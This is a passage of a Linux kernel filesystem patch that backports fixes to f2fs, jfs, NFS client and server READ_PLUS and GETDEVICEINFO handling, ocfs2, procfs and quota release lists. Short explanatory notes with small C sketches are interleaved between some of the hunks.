+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index b6dad389fa144..2046f633fe57a 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -858,11 +858,6 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 			if (!name)
+ 				return -ENOMEM;
+ 			if (!strcmp(name, "adaptive")) {
+-				if (f2fs_sb_has_blkzoned(sbi)) {
+-					f2fs_warn(sbi, "adaptive mode is not allowed with zoned block device feature");
+-					kfree(name);
+-					return -EINVAL;
+-				}
+ 				F2FS_OPTION(sbi).fs_mode = FS_MODE_ADAPTIVE;
+ 			} else if (!strcmp(name, "lfs")) {
+ 				F2FS_OPTION(sbi).fs_mode = FS_MODE_LFS;
+@@ -1285,19 +1280,23 @@ default_check:
+ 	 * zone alignment optimization. This is optional for host-aware
+ 	 * devices, but mandatory for host-managed zoned block devices.
+ 	 */
+-#ifndef CONFIG_BLK_DEV_ZONED
+-	if (f2fs_sb_has_blkzoned(sbi)) {
+-		f2fs_err(sbi, "Zoned block device support is not enabled");
+-		return -EINVAL;
+-	}
+-#endif
+ 	if (f2fs_sb_has_blkzoned(sbi)) {
++#ifdef CONFIG_BLK_DEV_ZONED
+ 		if (F2FS_OPTION(sbi).discard_unit !=
+ 						DISCARD_UNIT_SECTION) {
+ 			f2fs_info(sbi, "Zoned block device doesn't need small discard, set discard_unit=section by default");
+ 			F2FS_OPTION(sbi).discard_unit =
+ 					DISCARD_UNIT_SECTION;
+ 		}
++
++		if (F2FS_OPTION(sbi).fs_mode != FS_MODE_LFS) {
++			f2fs_info(sbi, "Only lfs mode is allowed with zoned block device feature");
++			return -EINVAL;
++		}
++#else
++		f2fs_err(sbi, "Zoned block device support is not enabled");
++		return -EINVAL;
++#endif
+ 	}
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+diff --git a/fs/fs_context.c b/fs/fs_context.c
+index 851214d1d013d..375023e40161d 100644
+--- a/fs/fs_context.c
++++ b/fs/fs_context.c
+@@ -315,10 +315,31 @@ struct fs_context *fs_context_for_reconfigure(struct dentry *dentry,
+ }
+ EXPORT_SYMBOL(fs_context_for_reconfigure);
+ 
++/**
++ * fs_context_for_submount: allocate a new fs_context for a submount
++ * @type: file_system_type of the new context
++ * @reference: reference dentry from which to copy relevant info
++ *
++ * Allocate a new fs_context suitable for a submount. This also ensures that
++ * the fc->security object is inherited from @reference (if needed).
++ */
+ struct fs_context *fs_context_for_submount(struct file_system_type *type,
+ 					   struct dentry *reference)
+ {
+-	return alloc_fs_context(type, reference, 0, 0, FS_CONTEXT_FOR_SUBMOUNT);
++	struct fs_context *fc;
++	int ret;
++
++	fc = alloc_fs_context(type, reference, 0, 0, FS_CONTEXT_FOR_SUBMOUNT);
++	if (IS_ERR(fc))
++		return fc;
++
++	ret = security_fs_context_submount(fc, reference->d_sb);
++	if (ret) {
++		put_fs_context(fc);
++		return ERR_PTR(ret);
++	}
++
++	return fc;
+ }
+ EXPORT_SYMBOL(fs_context_for_submount);
+ 
+diff --git a/fs/iomap/buffered-io.c b/fs/iomap/buffered-io.c
+index 91ee0b308e13d..a0a4d8de82cad 100644
+--- a/fs/iomap/buffered-io.c
++++ b/fs/iomap/buffered-io.c
+@@ -488,11 +488,6 @@ void iomap_invalidate_folio(struct folio *folio, size_t offset, size_t len)
+ 		WARN_ON_ONCE(folio_test_writeback(folio));
+ 		folio_cancel_dirty(folio);
+ 		iomap_page_release(folio);
+-	} else if (folio_test_large(folio)) {
+-		/* Must release the iop so the page can be split */
+-		WARN_ON_ONCE(!folio_test_uptodate(folio) &&
+-			     folio_test_dirty(folio));
+-		iomap_page_release(folio);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(iomap_invalidate_folio);
+diff --git a/fs/jfs/jfs_extent.c b/fs/jfs/jfs_extent.c
+index ae99a7e232eeb..a82751e6c47f9 100644
+--- a/fs/jfs/jfs_extent.c
++++ b/fs/jfs/jfs_extent.c
+@@ -311,6 +311,11 @@ extBalloc(struct inode *ip, s64 hint, s64 * nblocks, s64 * blkno)
+ 	 * blocks in the map. in that case, we'll start off with the
+ 	 * maximum free.
+ 	 */
++
++	/* give up if no space left */
++	if (bmp->db_maxfreebud == -1)
++		return -ENOSPC;
++
+ 	max = (s64) 1 << bmp->db_maxfreebud;
+ 	if (*nblocks >= max && *nblocks > nbperpage)
+ 		nb = nblks = (max > nbperpage) ? max : nbperpage;
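The jfs guard matters because db_maxfreebud is -1 when the block map has no free space left, and shifting by -1 is undefined behaviour; returning -ENOSPC first avoids ever evaluating it. A minimal sketch:

#include <errno.h>
#include <stdio.h>

static long long max_free_blocks(int db_maxfreebud)
{
	if (db_maxfreebud == -1)	/* block map has no space left */
		return -ENOSPC;
	return 1LL << db_maxfreebud;	/* shift is now well defined */
}

int main(void)
{
	printf("%lld\n", max_free_blocks(10));	/* 1024 */
	printf("%lld\n", max_free_blocks(-1));	/* -ENOSPC */
	return 0;
}
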
+diff --git a/fs/lockd/mon.c b/fs/lockd/mon.c
+index 1d9488cf05348..87a0f207df0b9 100644
+--- a/fs/lockd/mon.c
++++ b/fs/lockd/mon.c
+@@ -276,6 +276,9 @@ static struct nsm_handle *nsm_create_handle(const struct sockaddr *sap,
+ {
+ 	struct nsm_handle *new;
+ 
++	if (!hostname)
++		return NULL;
++
+ 	new = kzalloc(sizeof(*new) + hostname_len + 1, GFP_KERNEL);
+ 	if (unlikely(new == NULL))
+ 		return NULL;
+diff --git a/fs/namei.c b/fs/namei.c
+index 5b3865ad9d052..4248647f1ab24 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -2859,7 +2859,7 @@ int path_pts(struct path *path)
+ 	dput(path->dentry);
+ 	path->dentry = parent;
+ 	child = d_hash_and_lookup(parent, &this);
+-	if (!child)
++	if (IS_ERR_OR_NULL(child))
+ 		return -ENOENT;
+ 
+ 	path->dentry = child;
+diff --git a/fs/nfs/blocklayout/dev.c b/fs/nfs/blocklayout/dev.c
+index fea5f8821da5e..ce2ea62397972 100644
+--- a/fs/nfs/blocklayout/dev.c
++++ b/fs/nfs/blocklayout/dev.c
+@@ -402,7 +402,7 @@ bl_parse_concat(struct nfs_server *server, struct pnfs_block_dev *d,
+ 	int ret, i;
+ 
+ 	d->children = kcalloc(v->concat.volumes_count,
+-			sizeof(struct pnfs_block_dev), GFP_KERNEL);
++			sizeof(struct pnfs_block_dev), gfp_mask);
+ 	if (!d->children)
+ 		return -ENOMEM;
+ 
+@@ -431,7 +431,7 @@ bl_parse_stripe(struct nfs_server *server, struct pnfs_block_dev *d,
+ 	int ret, i;
+ 
+ 	d->children = kcalloc(v->stripe.volumes_count,
+-			sizeof(struct pnfs_block_dev), GFP_KERNEL);
++			sizeof(struct pnfs_block_dev), gfp_mask);
+ 	if (!d->children)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index ae7d4a8c728c2..4b07a0508f9d8 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -484,6 +484,7 @@ struct nfs_pgio_completion_ops;
+ extern void nfs_pageio_init_read(struct nfs_pageio_descriptor *pgio,
+ 			struct inode *inode, bool force_mds,
+ 			const struct nfs_pgio_completion_ops *compl_ops);
++extern bool nfs_read_alloc_scratch(struct nfs_pgio_header *hdr, size_t size);
+ extern void nfs_read_prepare(struct rpc_task *task, void *calldata);
+ extern void nfs_pageio_reset_read_mds(struct nfs_pageio_descriptor *pgio);
+ 
+diff --git a/fs/nfs/nfs2xdr.c b/fs/nfs/nfs2xdr.c
+index 05c3b4b2b3dd8..c190938142960 100644
+--- a/fs/nfs/nfs2xdr.c
++++ b/fs/nfs/nfs2xdr.c
+@@ -949,7 +949,7 @@ int nfs2_decode_dirent(struct xdr_stream *xdr, struct nfs_entry *entry,
+ 
+ 	error = decode_filename_inline(xdr, &entry->name, &entry->len);
+ 	if (unlikely(error))
+-		return -EAGAIN;
++		return error == -ENAMETOOLONG ? -ENAMETOOLONG : -EAGAIN;
+ 
+ 	/*
+ 	 * The type (size and byte order) of nfscookie isn't defined in
+diff --git a/fs/nfs/nfs3xdr.c b/fs/nfs/nfs3xdr.c
+index 3b0b650c9c5ab..60f032be805ae 100644
+--- a/fs/nfs/nfs3xdr.c
++++ b/fs/nfs/nfs3xdr.c
+@@ -1991,7 +1991,7 @@ int nfs3_decode_dirent(struct xdr_stream *xdr, struct nfs_entry *entry,
+ 
+ 	error = decode_inline_filename3(xdr, &entry->name, &entry->len);
+ 	if (unlikely(error))
+-		return -EAGAIN;
++		return error == -ENAMETOOLONG ? -ENAMETOOLONG : -EAGAIN;
+ 
+ 	error = decode_cookie3(xdr, &new_cookie);
+ 	if (unlikely(error))
+diff --git a/fs/nfs/nfs42.h b/fs/nfs/nfs42.h
+index 0fe5aacbcfdf1..b59876b01a1e3 100644
+--- a/fs/nfs/nfs42.h
++++ b/fs/nfs/nfs42.h
+@@ -13,6 +13,7 @@
+  * more? Need to consider not to pre-alloc too much for a compound.
+  */
+ #define PNFS_LAYOUTSTATS_MAXDEV (4)
++#define READ_PLUS_SCRATCH_SIZE (16)
+ 
+ /* nfs4.2proc.c */
+ #ifdef CONFIG_NFS_V4_2
+diff --git a/fs/nfs/nfs42proc.c b/fs/nfs/nfs42proc.c
+index 7c33bba179d2f..d903ea10410c2 100644
+--- a/fs/nfs/nfs42proc.c
++++ b/fs/nfs/nfs42proc.c
+@@ -470,8 +470,9 @@ ssize_t nfs42_proc_copy(struct file *src, loff_t pos_src,
+ 				continue;
+ 			}
+ 			break;
+-		} else if (err == -NFS4ERR_OFFLOAD_NO_REQS && !args.sync) {
+-			args.sync = true;
++		} else if (err == -NFS4ERR_OFFLOAD_NO_REQS &&
++				args.sync != res.synchronous) {
++			args.sync = res.synchronous;
+ 			dst_exception.retry = 1;
+ 			continue;
+ 		} else if ((err == -ESTALE ||
+diff --git a/fs/nfs/nfs42xdr.c b/fs/nfs/nfs42xdr.c
+index 2fd465cab631d..20aa5e746497d 100644
+--- a/fs/nfs/nfs42xdr.c
++++ b/fs/nfs/nfs42xdr.c
+@@ -47,13 +47,20 @@
+ #define decode_deallocate_maxsz		(op_decode_hdr_maxsz)
+ #define encode_read_plus_maxsz		(op_encode_hdr_maxsz + \
+ 					 encode_stateid_maxsz + 3)
+-#define NFS42_READ_PLUS_SEGMENT_SIZE	(1 /* data_content4 */ + \
++#define NFS42_READ_PLUS_DATA_SEGMENT_SIZE \
++					(1 /* data_content4 */ + \
++					 2 /* data_info4.di_offset */ + \
++					 1 /* data_info4.di_length */)
++#define NFS42_READ_PLUS_HOLE_SEGMENT_SIZE \
++					(1 /* data_content4 */ + \
+ 					 2 /* data_info4.di_offset */ + \
+ 					 2 /* data_info4.di_length */)
++#define READ_PLUS_SEGMENT_SIZE_DIFF	(NFS42_READ_PLUS_HOLE_SEGMENT_SIZE - \
++					 NFS42_READ_PLUS_DATA_SEGMENT_SIZE)
+ #define decode_read_plus_maxsz		(op_decode_hdr_maxsz + \
+ 					 1 /* rpr_eof */ + \
+ 					 1 /* rpr_contents count */ + \
+-					 2 * NFS42_READ_PLUS_SEGMENT_SIZE)
++					 NFS42_READ_PLUS_HOLE_SEGMENT_SIZE)
+ #define encode_seek_maxsz		(op_encode_hdr_maxsz + \
+ 					 encode_stateid_maxsz + \
+ 					 2 /* offset */ + \
+@@ -780,8 +787,8 @@ static void nfs4_xdr_enc_read_plus(struct rpc_rqst *req,
+ 	encode_putfh(xdr, args->fh, &hdr);
+ 	encode_read_plus(xdr, args, &hdr);
+ 
+-	rpc_prepare_reply_pages(req, args->pages, args->pgbase,
+-				args->count, hdr.replen);
++	rpc_prepare_reply_pages(req, args->pages, args->pgbase, args->count,
++				hdr.replen - READ_PLUS_SEGMENT_SIZE_DIFF);
+ 	encode_nops(&hdr);
+ }
+ 
+@@ -1121,7 +1128,6 @@ static int decode_read_plus(struct xdr_stream *xdr, struct nfs_pgio_res *res)
+ 	uint32_t segments;
+ 	struct read_plus_segment *segs;
+ 	int status, i;
+-	char scratch_buf[16];
+ 	__be32 *p;
+ 
+ 	status = decode_op_hdr(xdr, OP_READ_PLUS);
+@@ -1136,14 +1142,12 @@ static int decode_read_plus(struct xdr_stream *xdr, struct nfs_pgio_res *res)
+ 	res->eof = be32_to_cpup(p++);
+ 	segments = be32_to_cpup(p++);
+ 	if (segments == 0)
+-		return status;
++		return 0;
+ 
+ 	segs = kmalloc_array(segments, sizeof(*segs), GFP_KERNEL);
+ 	if (!segs)
+ 		return -ENOMEM;
+ 
+-	xdr_set_scratch_buffer(xdr, &scratch_buf, sizeof(scratch_buf));
+-	status = -EIO;
+ 	for (i = 0; i < segments; i++) {
+ 		status = decode_read_plus_segment(xdr, &segs[i]);
+ 		if (status < 0)
+@@ -1347,6 +1351,8 @@ static int nfs4_xdr_dec_read_plus(struct rpc_rqst *rqstp,
+ 	struct compound_hdr hdr;
+ 	int status;
+ 
++	xdr_set_scratch_buffer(xdr, res->scratch, READ_PLUS_SCRATCH_SIZE);
++
+ 	status = decode_compound_hdr(xdr, &hdr);
+ 	if (status)
+ 		goto out;
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 1044305e77996..2dec0fed1ba16 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5459,17 +5459,21 @@ static int nfs4_read_done(struct rpc_task *task, struct nfs_pgio_header *hdr)
+ }
+ 
+ #if defined CONFIG_NFS_V4_2 && defined CONFIG_NFS_V4_2_READ_PLUS
+-static void nfs42_read_plus_support(struct nfs_pgio_header *hdr,
++static bool nfs42_read_plus_support(struct nfs_pgio_header *hdr,
+ 				    struct rpc_message *msg)
+ {
+ 	/* Note: We don't use READ_PLUS with pNFS yet */
+-	if (nfs_server_capable(hdr->inode, NFS_CAP_READ_PLUS) && !hdr->ds_clp)
++	if (nfs_server_capable(hdr->inode, NFS_CAP_READ_PLUS) && !hdr->ds_clp) {
+ 		msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ_PLUS];
++		return nfs_read_alloc_scratch(hdr, READ_PLUS_SCRATCH_SIZE);
++	}
++	return false;
+ }
+ #else
+-static void nfs42_read_plus_support(struct nfs_pgio_header *hdr,
++static bool nfs42_read_plus_support(struct nfs_pgio_header *hdr,
+ 				    struct rpc_message *msg)
+ {
++	return false;
+ }
+ #endif /* CONFIG_NFS_V4_2 */
+ 
+@@ -5479,8 +5483,8 @@ static void nfs4_proc_read_setup(struct nfs_pgio_header *hdr,
+ 	hdr->timestamp   = jiffies;
+ 	if (!hdr->pgio_done_cb)
+ 		hdr->pgio_done_cb = nfs4_read_done_cb;
+-	msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ];
+-	nfs42_read_plus_support(hdr, msg);
++	if (!nfs42_read_plus_support(hdr, msg))
++		msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ];
+ 	nfs4_init_sequence(&hdr->args.seq_args, &hdr->res.seq_res, 0, 0);
+ }
+ 
+diff --git a/fs/nfs/pnfs_nfs.c b/fs/nfs/pnfs_nfs.c
+index 5d035dd2d7bf0..47a8da3f5c9ff 100644
+--- a/fs/nfs/pnfs_nfs.c
++++ b/fs/nfs/pnfs_nfs.c
+@@ -943,7 +943,7 @@ static int _nfs4_pnfs_v4_ds_connect(struct nfs_server *mds_srv,
+ 			* Test this address for session trunking and
+ 			* add as an alias
+ 			*/
+-			xprtdata.cred = nfs4_get_clid_cred(clp),
++			xprtdata.cred = nfs4_get_clid_cred(clp);
+ 			rpc_clnt_add_xprt(clp->cl_rpcclient, &xprt_args,
+ 					  rpc_clnt_setup_test_and_add_xprt,
+ 					  &rpcdata);
+diff --git a/fs/nfs/read.c b/fs/nfs/read.c
+index cd970ce62786b..6aad42fbf797a 100644
+--- a/fs/nfs/read.c
++++ b/fs/nfs/read.c
+@@ -47,6 +47,8 @@ static struct nfs_pgio_header *nfs_readhdr_alloc(void)
+ 
+ static void nfs_readhdr_free(struct nfs_pgio_header *rhdr)
+ {
++	if (rhdr->res.scratch != NULL)
++		kfree(rhdr->res.scratch);
+ 	kmem_cache_free(nfs_rdata_cachep, rhdr);
+ }
+ 
+@@ -109,6 +111,14 @@ void nfs_pageio_reset_read_mds(struct nfs_pageio_descriptor *pgio)
+ }
+ EXPORT_SYMBOL_GPL(nfs_pageio_reset_read_mds);
+ 
++bool nfs_read_alloc_scratch(struct nfs_pgio_header *hdr, size_t size)
++{
++	WARN_ON(hdr->res.scratch != NULL);
++	hdr->res.scratch = kmalloc(size, GFP_KERNEL);
++	return hdr->res.scratch != NULL;
++}
++EXPORT_SYMBOL_GPL(nfs_read_alloc_scratch);
++
+ static void nfs_readpage_release(struct nfs_page *req, int error)
+ {
+ 	struct inode *inode = d_inode(nfs_req_openctx(req)->dentry);
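nfs_read_alloc_scratch() replaces the on-stack scratch buffer the READ_PLUS decoder used to set up on every call: the buffer is now allocated once with the pgio header and freed with it. A user-space sketch of that ownership pattern, names hypothetical:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define READ_PLUS_SCRATCH_SIZE 16

struct pgio_header { void *scratch; };

/* Allocate the decoder's scratch buffer once, with the request. */
static int read_alloc_scratch(struct pgio_header *hdr, size_t size)
{
	hdr->scratch = malloc(size);
	return hdr->scratch != NULL;
}

static void pgio_header_free(struct pgio_header *hdr)
{
	free(hdr->scratch);	/* free(NULL) is a no-op */
}

int main(void)
{
	struct pgio_header hdr = { NULL };

	if (!read_alloc_scratch(&hdr, READ_PLUS_SCRATCH_SIZE))
		return 1;
	memset(hdr.scratch, 0, READ_PLUS_SCRATCH_SIZE);	/* decoder's use */
	pgio_header_free(&hdr);
	return 0;
}
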
+diff --git a/fs/nfsd/blocklayoutxdr.c b/fs/nfsd/blocklayoutxdr.c
+index 442543304930b..2455dc8be18a8 100644
+--- a/fs/nfsd/blocklayoutxdr.c
++++ b/fs/nfsd/blocklayoutxdr.c
+@@ -82,6 +82,15 @@ nfsd4_block_encode_getdeviceinfo(struct xdr_stream *xdr,
+ 	int len = sizeof(__be32), ret, i;
+ 	__be32 *p;
+ 
++	/*
++	 * See paragraph 5 of RFC 8881 S18.40.3.
++	 */
++	if (!gdp->gd_maxcount) {
++		if (xdr_stream_encode_u32(xdr, 0) != XDR_UNIT)
++			return nfserr_resource;
++		return nfs_ok;
++	}
++
+ 	p = xdr_reserve_space(xdr, len + sizeof(__be32));
+ 	if (!p)
+ 		return nfserr_resource;
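Per RFC 8881 section 18.40.3, a GETDEVICEINFO request with gdia_maxcount of zero only updates notifications, so the encoder must emit a zero-length da_addr_body rather than the full device address. A sketch of encoding that single XDR word:

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
	unsigned char buf[4];
	uint32_t zero_len = htonl(0);	/* one XDR word, big-endian */

	memcpy(buf, &zero_len, sizeof(buf));
	printf("da_addr_body: %02x %02x %02x %02x (length 0)\n",
	       buf[0], buf[1], buf[2], buf[3]);
	return 0;
}
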
+diff --git a/fs/nfsd/flexfilelayoutxdr.c b/fs/nfsd/flexfilelayoutxdr.c
+index e81d2a5cf381e..bb205328e043d 100644
+--- a/fs/nfsd/flexfilelayoutxdr.c
++++ b/fs/nfsd/flexfilelayoutxdr.c
+@@ -85,6 +85,15 @@ nfsd4_ff_encode_getdeviceinfo(struct xdr_stream *xdr,
+ 	int addr_len;
+ 	__be32 *p;
+ 
++	/*
++	 * See paragraph 5 of RFC 8881 S18.40.3.
++	 */
++	if (!gdp->gd_maxcount) {
++		if (xdr_stream_encode_u32(xdr, 0) != XDR_UNIT)
++			return nfserr_resource;
++		return nfs_ok;
++	}
++
+ 	/* len + padding for two strings */
+ 	addr_len = 16 + da->netaddr.netid_len + da->netaddr.addr_len;
+ 	ver_len = 20;
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 8f90a87ee9ca0..89a579be042e5 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -4571,20 +4571,17 @@ nfsd4_encode_getdeviceinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ 	*p++ = cpu_to_be32(gdev->gd_layout_type);
+ 
+-	/* If maxcount is 0 then just update notifications */
+-	if (gdev->gd_maxcount != 0) {
+-		ops = nfsd4_layout_ops[gdev->gd_layout_type];
+-		nfserr = ops->encode_getdeviceinfo(xdr, gdev);
+-		if (nfserr) {
+-			/*
+-			 * We don't bother to burden the layout drivers with
+-			 * enforcing gd_maxcount, just tell the client to
+-			 * come back with a bigger buffer if it's not enough.
+-			 */
+-			if (xdr->buf->len + 4 > gdev->gd_maxcount)
+-				goto toosmall;
+-			return nfserr;
+-		}
++	ops = nfsd4_layout_ops[gdev->gd_layout_type];
++	nfserr = ops->encode_getdeviceinfo(xdr, gdev);
++	if (nfserr) {
++		/*
++		 * We don't bother to burden the layout drivers with
++		 * enforcing gd_maxcount, just tell the client to
++		 * come back with a bigger buffer if it's not enough.
++		 */
++		if (xdr->buf->len + 4 > gdev->gd_maxcount)
++			goto toosmall;
++		return nfserr;
+ 	}
+ 
+ 	if (gdev->gd_notify_types) {
+diff --git a/fs/nls/nls_base.c b/fs/nls/nls_base.c
+index 52ccd34b1e792..a026dbd3593f6 100644
+--- a/fs/nls/nls_base.c
++++ b/fs/nls/nls_base.c
+@@ -272,7 +272,7 @@ int unregister_nls(struct nls_table * nls)
+ 	return -EINVAL;
+ }
+ 
+-static struct nls_table *find_nls(char *charset)
++static struct nls_table *find_nls(const char *charset)
+ {
+ 	struct nls_table *nls;
+ 	spin_lock(&nls_lock);
+@@ -288,7 +288,7 @@ static struct nls_table *find_nls(char *charset)
+ 	return nls;
+ }
+ 
+-struct nls_table *load_nls(char *charset)
++struct nls_table *load_nls(const char *charset)
+ {
+ 	return try_then_request_module(find_nls(charset), "nls_%s", charset);
+ }
+diff --git a/fs/ocfs2/namei.c b/fs/ocfs2/namei.c
+index 1c7ac433667df..04a8505bd97af 100644
+--- a/fs/ocfs2/namei.c
++++ b/fs/ocfs2/namei.c
+@@ -1535,6 +1535,10 @@ static int ocfs2_rename(struct user_namespace *mnt_userns,
+ 		status = ocfs2_add_entry(handle, new_dentry, old_inode,
+ 					 OCFS2_I(old_inode)->ip_blkno,
+ 					 new_dir_bh, &target_insert);
++		if (status < 0) {
++			mlog_errno(status);
++			goto bail;
++		}
+ 	}
+ 
+ 	old_inode->i_ctime = current_time(old_inode);
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 51eec4a8e82b2..08d3a1f34ac6c 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -2155,7 +2155,7 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent)
+ 		ovl_trusted_xattr_handlers;
+ 	sb->s_fs_info = ofs;
+ 	sb->s_flags |= SB_POSIXACL;
+-	sb->s_iflags |= SB_I_SKIP_SYNC;
++	sb->s_iflags |= SB_I_SKIP_SYNC | SB_I_IMA_UNVERIFIABLE_SIGNATURE;
+ 
+ 	err = -ENOMEM;
+ 	root_dentry = ovl_get_root(sb, upperpath.dentry, oe);
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b1..74442e01793f3 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -3581,7 +3581,8 @@ static int proc_tid_comm_permission(struct user_namespace *mnt_userns,
+ }
+ 
+ static const struct inode_operations proc_tid_comm_inode_operations = {
+-		.permission = proc_tid_comm_permission,
++		.setattr	= proc_setattr,
++		.permission	= proc_tid_comm_permission,
+ };
+ 
+ /*
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index 2384de1c2d187..1e755d093d921 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -518,7 +518,7 @@ static int persistent_ram_post_init(struct persistent_ram_zone *prz, u32 sig,
+ 	sig ^= PERSISTENT_RAM_SIG;
+ 
+ 	if (prz->buffer->sig == sig) {
+-		if (buffer_size(prz) == 0) {
++		if (buffer_size(prz) == 0 && buffer_start(prz) == 0) {
+ 			pr_debug("found existing empty buffer\n");
+ 			return 0;
+ 		}
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index 46dca88d89c36..53b65c5300fde 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -225,13 +225,22 @@ static void put_quota_format(struct quota_format_type *fmt)
+ 
+ /*
+  * Dquot List Management:
+- * The quota code uses four lists for dquot management: the inuse_list,
+- * free_dquots, dqi_dirty_list, and dquot_hash[] array. A single dquot
+- * structure may be on some of those lists, depending on its current state.
++ * The quota code uses five lists for dquot management: the inuse_list,
++ * releasing_dquots, free_dquots, dqi_dirty_list, and dquot_hash[] array.
++ * A single dquot structure may be on some of those lists, depending on
++ * its current state.
+  *
+  * All dquots are placed to the end of inuse_list when first created, and this
+  * list is used for invalidate operation, which must look at every dquot.
+  *
++ * When the last reference of a dquot is dropped, the dquot will be
++ * added to releasing_dquots. We'd then queue work item which would call
++ * synchronize_srcu() and after that perform the final cleanup of all the
++ * dquots on the list. Both releasing_dquots and free_dquots use the
++ * dq_free list_head in the dquot struct. When a dquot is removed from
++ * releasing_dquots, a reference count is always subtracted, and if
++ * dq_count == 0 at that point, the dquot will be added to the free_dquots.
++ *
+  * Unused dquots (dq_count == 0) are added to the free_dquots list when freed,
+  * and this list is searched whenever we need an available dquot.  Dquots are
+  * removed from the list as soon as they are used again, and
+@@ -250,6 +259,7 @@ static void put_quota_format(struct quota_format_type *fmt)
+ 
+ static LIST_HEAD(inuse_list);
+ static LIST_HEAD(free_dquots);
++static LIST_HEAD(releasing_dquots);
+ static unsigned int dq_hash_bits, dq_hash_mask;
+ static struct hlist_head *dquot_hash;
+ 
+@@ -260,6 +270,9 @@ static qsize_t inode_get_rsv_space(struct inode *inode);
+ static qsize_t __inode_get_rsv_space(struct inode *inode);
+ static int __dquot_initialize(struct inode *inode, int type);
+ 
++static void quota_release_workfn(struct work_struct *work);
++static DECLARE_DELAYED_WORK(quota_release_work, quota_release_workfn);
++
+ static inline unsigned int
+ hashfn(const struct super_block *sb, struct kqid qid)
+ {
+@@ -305,12 +318,18 @@ static inline void put_dquot_last(struct dquot *dquot)
+ 	dqstats_inc(DQST_FREE_DQUOTS);
+ }
+ 
++static inline void put_releasing_dquots(struct dquot *dquot)
++{
++	list_add_tail(&dquot->dq_free, &releasing_dquots);
++}
++
+ static inline void remove_free_dquot(struct dquot *dquot)
+ {
+ 	if (list_empty(&dquot->dq_free))
+ 		return;
+ 	list_del_init(&dquot->dq_free);
+-	dqstats_dec(DQST_FREE_DQUOTS);
++	if (!atomic_read(&dquot->dq_count))
++		dqstats_dec(DQST_FREE_DQUOTS);
+ }
+ 
+ static inline void put_inuse(struct dquot *dquot)
+@@ -336,6 +355,11 @@ static void wait_on_dquot(struct dquot *dquot)
+ 	mutex_unlock(&dquot->dq_lock);
+ }
+ 
++static inline int dquot_active(struct dquot *dquot)
++{
++	return test_bit(DQ_ACTIVE_B, &dquot->dq_flags);
++}
++
+ static inline int dquot_dirty(struct dquot *dquot)
+ {
+ 	return test_bit(DQ_MOD_B, &dquot->dq_flags);
+@@ -351,14 +375,14 @@ int dquot_mark_dquot_dirty(struct dquot *dquot)
+ {
+ 	int ret = 1;
+ 
+-	if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags))
++	if (!dquot_active(dquot))
+ 		return 0;
+ 
+ 	if (sb_dqopt(dquot->dq_sb)->flags & DQUOT_NOLIST_DIRTY)
+ 		return test_and_set_bit(DQ_MOD_B, &dquot->dq_flags);
+ 
+ 	/* If quota is dirty already, we don't have to acquire dq_list_lock */
+-	if (test_bit(DQ_MOD_B, &dquot->dq_flags))
++	if (dquot_dirty(dquot))
+ 		return 1;
+ 
+ 	spin_lock(&dq_list_lock);
+@@ -440,7 +464,7 @@ int dquot_acquire(struct dquot *dquot)
+ 	smp_mb__before_atomic();
+ 	set_bit(DQ_READ_B, &dquot->dq_flags);
+ 	/* Instantiate dquot if needed */
+-	if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags) && !dquot->dq_off) {
++	if (!dquot_active(dquot) && !dquot->dq_off) {
+ 		ret = dqopt->ops[dquot->dq_id.type]->commit_dqblk(dquot);
+ 		/* Write the info if needed */
+ 		if (info_dirty(&dqopt->info[dquot->dq_id.type])) {
+@@ -482,7 +506,7 @@ int dquot_commit(struct dquot *dquot)
+ 		goto out_lock;
+ 	/* Inactive dquot can be only if there was error during read/init
+ 	 * => we have better not writing it */
+-	if (test_bit(DQ_ACTIVE_B, &dquot->dq_flags))
++	if (dquot_active(dquot))
+ 		ret = dqopt->ops[dquot->dq_id.type]->commit_dqblk(dquot);
+ 	else
+ 		ret = -EIO;
+@@ -547,6 +571,8 @@ static void invalidate_dquots(struct super_block *sb, int type)
+ 	struct dquot *dquot, *tmp;
+ 
+ restart:
++	flush_delayed_work(&quota_release_work);
++
+ 	spin_lock(&dq_list_lock);
+ 	list_for_each_entry_safe(dquot, tmp, &inuse_list, dq_inuse) {
+ 		if (dquot->dq_sb != sb)
+@@ -555,6 +581,12 @@ restart:
+ 			continue;
+ 		/* Wait for dquot users */
+ 		if (atomic_read(&dquot->dq_count)) {
++			/* dquot in releasing_dquots, flush and retry */
++			if (!list_empty(&dquot->dq_free)) {
++				spin_unlock(&dq_list_lock);
++				goto restart;
++			}
++
+ 			atomic_inc(&dquot->dq_count);
+ 			spin_unlock(&dq_list_lock);
+ 			/*
+@@ -597,7 +629,7 @@ int dquot_scan_active(struct super_block *sb,
+ 
